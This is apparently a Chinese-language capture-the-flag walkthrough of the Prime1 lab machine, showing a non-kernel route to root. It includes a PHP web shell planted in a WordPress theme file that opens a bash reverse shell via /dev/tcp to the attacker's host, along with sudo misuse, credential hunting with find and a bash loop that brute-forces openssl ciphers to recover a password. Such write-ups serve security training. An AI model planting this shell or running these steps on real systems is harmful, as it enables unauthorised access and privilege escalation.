简介
Prime1 的另一种解法
起步
从初级shell开始
反弹 shell 路径
http://192.168.50.153/wordpress/wp-content/themes/twentynineteen/secret.php
其内的 shell 为
<?php eval("/bin/bash -c 'bash -i >& /dev/tcp/192.168.50.147/443 0>&1'");?>sudo ncat -lvnp 443 接收即可
尝试另一种解法
内核提权的手法相对暴力,对系统的稳定性有危害,漏洞容易被修复,所以考虑不使用内核提权的方法拿到 root
该说不说,ubantu 4.10.0-28 的内核很老
对 enc 很感兴趣
使用 strings 和 file 看不到
strings 用于从二进制文件中提取可打印的字符序列,file 用于确定文件类型
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /home/saket
<ml/wordpress/wp-content/themes/twentynineteen$ cd /home/saket
www-data@ubuntu:/home/saket$ ls -laih
ls -laih
total 36K
536440 drwxr-xr-x 2 root root 4.0K Aug 31 2019 .
1048577 drwxr-xr-x 4 root root 4.0K Aug 29 2019 ..
538264 -rw------- 1 root root 20 Aug 31 2019 .bash_history
538263 -rwxr-x--x 1 root root 14K Aug 30 2019 enc
536446 -rw-r--r-- 1 root root 18 Aug 29 2019 password.txt
526540 -rw-r--r-- 1 root root 33 Aug 31 2019 user.txt
www-data@ubuntu:/home/saket$ strings enc
strings enc
strings: enc: Permission denied
www-data@ubuntu:/home/saket$ file enc
file enc
enc: executable, regular file, no read permission
www-data@ubuntu:/home/saket$
这里需要依靠经验,enc 应当和 openssl 有关
如果要四处找找,就用 find 查找 *backup*。这里的文件名 backup 是由经验来的,或者是靶机作者的命名习惯
www-data@ubuntu:/home/saket$ find / -name '*backup*' 2>/dev/null
内容很多,挑出一些特殊的文件名
/var/backups
/opt/backup
/opt/backup/server_database/backup_pass
再四处看看
在位置 /opt/backup/server_database/backup_pass 文件中看到内容,是一个密码
backup_password
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /opt/backup
<ml/wordpress/wp-content/themes/twentynineteen$ cd /opt/backup
www-data@ubuntu:/opt/backup$ ls -liah
ls -liah
total 12K
414037 drwxr-xr-x 3 root root 4.0K Aug 30 2019 .
393218 drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
414038 drwxr-xr-x 2 root root 4.0K Aug 30 2019 server_database
www-data@ubuntu:/opt/backup$ cd server_database
cd server_database
www-data@ubuntu:/opt/backup/server_database$ ls -liah
ls -liah
total 12K
414038 drwxr-xr-x 2 root root 4.0K Aug 30 2019 .
414037 drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
414108 -rw-r--r-- 1 root root 75 Aug 30 2019 backup_pass
414042 -rw-r--r-- 1 root root 0 Aug 30 2019 {hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
www-data@ubuntu:/opt/backup/server_database$
这里总结一下查找的技巧,find / -name ‘*backup*’
find / -name ‘*pass*’ 也能
bash 中把错误输出扔垃圾桶 2>/dev/null
输出使用 | less 方便观察
执行密码试一试,加上sudo 的执行结果不一样。通过观察发现是用 cp 拷贝了一些文件
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password: backup_password
good
/bin/cp: cannot stat '/root/enc.txt': Permission denied
/bin/cp: cannot stat '/root/key.txt': Permission denied
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good
www-data@ubuntu:/home/saket$
推测这两个.txt 从/root 拷贝到 /home/saket 中
www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
www-data@ubuntu:/home/saket$
通过观察 enc.txt 是一个 base64 。key.txt 提示要把 ippsec 转成 md5,然后再做一个什么事
这里要凭借经验,和 openssh 相关的经验
用 kali 操作转md5
┌──(kali㉿kali)-[~]
└─$ sudo echo -n 'ippsec' | md5sum
366a74cb3c959de17d61db30591c39d1 -
┌──(kali㉿kali)-[~]
└─$ sudo echo -n 'ippsec' | md5sum | awk -F' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1
捣鼓 openssl 的加密
先看一看 openssl 的加密方式
主要关注 Message Digest 和 Cipher commands 的内容
┌──(kali㉿kali)-[~]
└─$ sudo openssl -help
help:
Standard commands
asn1parse ca ciphers cmp
cms crl crl2pkcs7 dgst
dhparam dsa dsaparam ec
ecparam enc engine errstr
fipsinstall gendsa genpkey genrsa
help info kdf list
mac nseq ocsp passwd
pkcs12 pkcs7 pkcs8 pkey
pkeyparam pkeyutl prime rand
rehash req rsa rsautl
s_client s_server s_time sess_id
smime speed spkac srp
storeutl ts verify version
x509
Message Digest commands (see the `dgst' command for more details)
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
Cipher commands (see the `enc' command for more details)
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
列出所有可能的 openssl 加密方式
sudo awk ‘{gsub(/ /,“\n”);print}’ CipherTypeRaw
┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw
┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq | wc -l
101
将这个东西存到一个文件里,方便后面用 bash 的 for 循环枚举
用 awk 处理前:
┌──(kali㉿kali)-[~/testPrime1]
└─$ cat CipherTypeRaw
blake2b512 blake2s256 md4 md5
rmd160 sha1 sha224 sha256
sha3-224 sha3-256 sha3-384 sha3-512
sha384 sha512 sha512-224 sha512-256
shake128 shake256 sm3
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb aria-128-cbc aria-128-cfb
aria-128-cfb1 aria-128-cfb8 aria-128-ctr aria-128-ecb
aria-128-ofb aria-192-cbc aria-192-cfb aria-192-cfb1
aria-192-cfb8 aria-192-ctr aria-192-ecb aria-192-ofb
aria-256-cbc aria-256-cfb aria-256-cfb1 aria-256-cfb8
aria-256-ctr aria-256-ecb aria-256-ofb base64
bf bf-cbc bf-cfb bf-ecb
bf-ofb camellia-128-cbc camellia-128-ecb camellia-192-cbc
camellia-192-ecb camellia-256-cbc camellia-256-ecb cast
cast-cbc cast5-cbc cast5-cfb cast5-ecb
cast5-ofb des des-cbc des-cfb
des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb
des-ede3-ofb des-ofb des3 desx
rc2 rc2-40-cbc rc2-64-cbc rc2-cbc
rc2-cfb rc2-ecb rc2-ofb rc4
rc4-40 seed seed-cbc seed-cfb
seed-ecb seed-ofb sm4-cbc sm4-cfb
sm4-ctr sm4-ecb sm4-ofb zlib
zstd
用 awk 处理后:
┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq
aes-128-cbc
aes-128-ecb
aes-192-cbc
aes-192-ecb
aes-256-cbc
aes-256-ecb
aria-128-cbc
aria-128-cfb
aria-128-cfb1
aria-128-cfb8
aria-128-ctr
aria-128-ecb
aria-128-ofb
aria-192-cbc
aria-192-cfb
aria-192-cfb1
aria-192-cfb8
aria-192-ctr
aria-192-ecb
aria-192-ofb
aria-256-cbc
aria-256-cfb
aria-256-cfb1
aria-256-cfb8
aria-256-ctr
aria-256-ecb
aria-256-ofb
base64
bf
bf-cbc
bf-cfb
bf-ecb
bf-ofb
blake2b512
blake2s256
camellia-128-cbc
camellia-128-ecb
camellia-192-cbc
camellia-192-ecb
camellia-256-cbc
camellia-256-ecb
cast
cast5-cbc
cast5-cfb
cast5-ecb
cast5-ofb
cast-cbc
des
des3
des-cbc
des-cfb
des-ecb
des-ede
des-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ofb
desx
md4
md5
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
rc2-ecb
rc2-ofb
rc4
rc4-40
rmd160
seed
seed-cbc
seed-cfb
seed-ecb
seed-ofb
sha1
sha224
sha256
sha3-224
sha3-256
sha3-384
sha3-512
sha384
sha512
sha512-224
sha512-256
shake128
shake256
sm3
sm4-cbc
sm4-cfb
sm4-ctr
sm4-ecb
sm4-ofb
zlib
zstd
┌──(kali㉿kali)-[~/testPrime1]
└─$ awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq | wc -l
101
脚本模板
由上文得到的两个线索
enc 看起来是个 base64
key 提示把 ‘ippsec’ 转为md5,并和当前用户名 saket 做一个运算来获得真正的形式
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
结合 openssl 的 enc 基本用法 (前文多次提到 enc ,结合经验推断为 openssl 的 enc 使用)
(截取部分内容,完整输出很长)
openssl enc -help
General options:
-help Display this summary
-e Encrypt
-d Decrypt
Output options:
-a Base64 encode/decode, depending on encryption flag
-base64 Same as option -a
Encryption options:
-K val Raw key, in hex
思路就是,用 ‘ippsec’ 以 md5 加密 转为 hex 作为 密钥,解 base64 字符串
先处理 key,由于加密方式不确定,可以通过 bash 脚本枚举,使用先前处理好的用于枚举的文件
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1
od 的用法,简单来说 把一个字符串转成 hex 十六进制
工具 od,缩写前为 octal dump,linux 内置
-A, --address-radix=RADIX
output format for file offsets; RADIX is one of [doxn], for Decimal, Octal, Hex or None
-t, --format=TYPE
select output format or formats
-x same as -t x2, select hexadecimal 2-byte units
用起来是这个效果,0a 是个异常的换行符,用 tr 搞一下 (哪这么麻烦,直接用鼠标得了😓)
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' | od -A n -t x1
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
0a
用一下 tr ,-d 代表删除,现在把 0a 删掉了
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31
37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
给他把换行删了,这样变成一行
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1| tr -d '\n'
33 36 36 61 37 34 63 62 33 63 39 35 39 64 65 31 37 64 36 31 64 62 33 30 35 39 31 63 33 39 64 31
用 tr 再删一下,把空格删掉,tr 做简单操作比较方便,用 awk 也可
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1| tr -d '\n'| tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431
用 awk 是这样换的 ( "茴"的四种写法 😓)
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'ippsec' | md5sum | awk -F ' ' '{print $1}' |tr -d '\n' | od -A n -t x1| tr -d '\n'| awk '{gsub(/ /,"");print}'
3336366137346362336339353964653137643631646233303539316333396431
于是模板就写好了( -CipherType 不是标准命令,是个占位符,方便后面 for 循环用),接下来用 bash 脚本枚举
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -CipherType -K 3336366137346362336339353964653137643631646233303539316333396431
for Cipher in $(cat CipherTypes);do echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
似乎都是错的
┌──(kali㉿kali)-[~/testPrime1]
└─$ for Cipher in $(cat CipherTypes);do echo -n 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
iv undefined
hex string is too long, ignoring excess
bad decrypt
80965B375F7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E657D43B7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
80661A0C5D7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80E6E66F967F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80669B95DA7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
bad decrypt
80A63B7B067F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80C6FCF7E67F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: blake2b512
enc: Use -help for summary.
80E6A5EBAA7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2b512 : 101), Properties (<null>)
enc: Unknown option or cipher: blake2s256
enc: Use -help for summary.
80B6F7BB807F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (blake2s256 : 99), Properties (<null>)
iv undefined
hex string is too long, ignoring excess
bad decrypt
8006A6E2B87F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
bad decrypt
8096BC60B77F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
bad decrypt
80269F70C97F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80B643FE557F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80367C71A27F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
80367A18C97F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
hex string is too long, ignoring excess
bad decrypt
8036C695C57F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
enc: Unknown option or cipher: md4
enc: Use -help for summary.
80067B405E7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md4 : 97), Properties (<null>)
enc: Unknown option or cipher: md5
enc: Use -help for summary.
8076BD49437F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (md5 : 98), Properties (<null>)
iv undefined
iv undefined
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80F69DACBB7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
hex string is too long, ignoring excess
hex string is too long, ignoring excess
enc: Unknown option or cipher: rmd160
enc: Use -help for summary.
80D6FDCC567F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (rmd160 : 0), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80F6B9693E7F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: sha1
enc: Use -help for summary.
808678DFBB7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha1 : 87), Properties (<null>)
enc: Unknown option or cipher: sha224
enc: Use -help for summary.
80168370F07F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha224 : 85), Properties (<null>)
enc: Unknown option or cipher: sha256
enc: Use -help for summary.
80360108337F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha256 : 100), Properties (<null>)
enc: Unknown option or cipher: sha3-224
enc: Use -help for summary.
80C60019407F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-224 : 86), Properties (<null>)
enc: Unknown option or cipher: sha3-256
enc: Use -help for summary.
8086D899647F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-256 : 95), Properties (<null>)
enc: Unknown option or cipher: sha3-384
enc: Use -help for summary.
80365A9DFC7E0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-384 : 88), Properties (<null>)
enc: Unknown option or cipher: sha3-512
enc: Use -help for summary.
80164276447F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha3-512 : 83), Properties (<null>)
enc: Unknown option or cipher: sha384
enc: Use -help for summary.
8016E532F57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha384 : 93), Properties (<null>)
enc: Unknown option or cipher: sha512
enc: Use -help for summary.
80D62544897F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512 : 90), Properties (<null>)
enc: Unknown option or cipher: sha512-224
enc: Use -help for summary.
80C67DA9C87F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-224 : 91), Properties (<null>)
enc: Unknown option or cipher: sha512-256
enc: Use -help for summary.
8006C3FA077F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sha512-256 : 84), Properties (<null>)
enc: Unknown option or cipher: shake128
enc: Use -help for summary.
805626F9E47F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake128 : 103), Properties (<null>)
enc: Unknown option or cipher: shake256
enc: Use -help for summary.
8076FDCEF57F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (shake256 : 92), Properties (<null>)
enc: Unknown option or cipher: sm3
enc: Use -help for summary.
8056FB9B5E7F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (sm3 : 94), Properties (<null>)
iv undefined
iv undefined
iv undefined
hex string is too long, ignoring excess
bad decrypt
80B6C24B237F0000:error:1C80006B:Provider routines:ossl_cipher_generic_block_final:wrong final block length:../providers/implementations/ciphers/ciphercommon.c:443:
iv undefined
enc: Unknown option or cipher: zlib
enc: Use -help for summary.
80C6586B737F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zlib : 0), Properties (<null>)
enc: Unknown option or cipher: zstd
enc: Use -help for summary.
80465CBD487F0000:error:0308010C:digital envelope routines:inner_evp_generic_fetch:unsupported:../crypto/evp/evp_fetch.c:355:Global default library context, Algorithm (zstd : 0), Properties (<null>)
原来是 openssl 的 bug,把 echo 的 -n 取消就行
┌──(kali㉿kali)-[~/testPrime1]
└─$ for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431;done
用这个,把错误信息丢掉,并打印加密的方式
for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $Cipher;done
┌──(kali㉿kali)-[~/testPrime1]
└─$ for Cipher in $(cat CipherTypes);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $Cipher;done
aes-128-cbc
l{���[��7�ƏmfE��K����;0�`Z▒�� :�y��N�.�Fj�|z�x�G���rd��/��
�:�Z91�yMV���@��S▒u����_j,����^+�FAC��ﴌ6���-��~��I�_���%���C���Դ��:��}T�q�4�同��#��ʛaes-128-ecb
aes-192-cbc
~I�l2UFײ:H3V�>Z����§��N[sgħ��:��-]�����v;ń#�M��|g��
�|&�As
�� �B0��mĖ�*�0r������{Hw� Ƕ�~�g�X�2▒�'+��+�����[D���5��d����!%o {aes-192-ecb
aes-256-cbc
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
aria-128-cbc
aria-128-cfb
aria-128-cfb1
aria-128-cfb8
aria-128-ctr
t[�����/<T5u���L?c���4��G�▒�ki*�U�f��E0��o��qp���õ/▒���@�wh��G�
ec�r�������]1��9ґp�IDW�p�wj��%�f�~2�LD▒�aria-128-ecb �?g�
aria-128-ofb
aria-192-cbc
aria-192-cfb
aria-192-cfb1
aria-192-cfb8
aria-192-ctr
<�▒�bØ�H�� TG
\�|��$�4���E����F���lS9��s��5��IV:W�[ijn1��E����=��YShL�����Tsq�"���{L�,"
�q�7w1|����s�;�d���/�S��▒7���%h��7�(
"yR����v�2�aria-192-ecb
aria-192-ofb
aria-256-cbc
aria-256-cfb
aria-256-cfb1
aria-256-cfb8
aria-256-ctr
,_���U(t��^>�3cm��=��~�V�ĩx&q�k����!�Z)�ͻ�x�I�䞝JW��▒���a�P����U����N5���Q�c�^Ƕ�> �W*��W����)~Rc#�c`ҋ���u�IPV����yX����]Oan�+�vJ▒1��aria-256-ecb
aria-256-ofb
?L.�ocX(���K��r�t�=���B�w�w����8*_���E#�������m8Bz\�7p��Jv��v�,6ב��;X�G'+��P���X�;j;f���YS1
�
��Ֆt7base64
bf
bf-cbc
bf-cfb
1�a��4�#�yQ.��H���
��8iN�HAn*�RXz{�GS��u�.��ߩ�Y���(�$Ҙ��z�gwF
1�EixN4��Rs�8�e�∌K �B�6M�ە�^vay��IQg
b����)-�wK8Qwx���ϥ��n�U"��1a|$t���HLF�σbf-ecb
bf-ofb
blake2b512
blake2s256
camellia-128-cbc
�!�#bW'ˀ�KE;!�"��{cyF
���7^��4�^�▒�9v��N�Ŧ+2f
���{��u\Z�|�2 �0�'Z�j�wUpRd��ew�:�˪\� �M�TkG%�Nƃ�g�S����Ր��O�{�osV�%�؆��c����0�a�YDD0d�Y�
C&camellia-128-ecb
camellia-192-cbc
�����?�E��wUaf�,T�]6�o�*��h}������J���7c�ю��@�J7��
��L�������~�2C�L34�4ĺ�s��I�$>���7��f����O
�+�{liSLʉ���,��E�U WǜS`Gsj����6�/��t~camellia-192-ecb
camellia-256-cbc
ހ��Ӑ��<�%wLC�~u����pgu�F��:XM��Jc�|����Ř▒��6"�����]7����#����Oܛ�=�
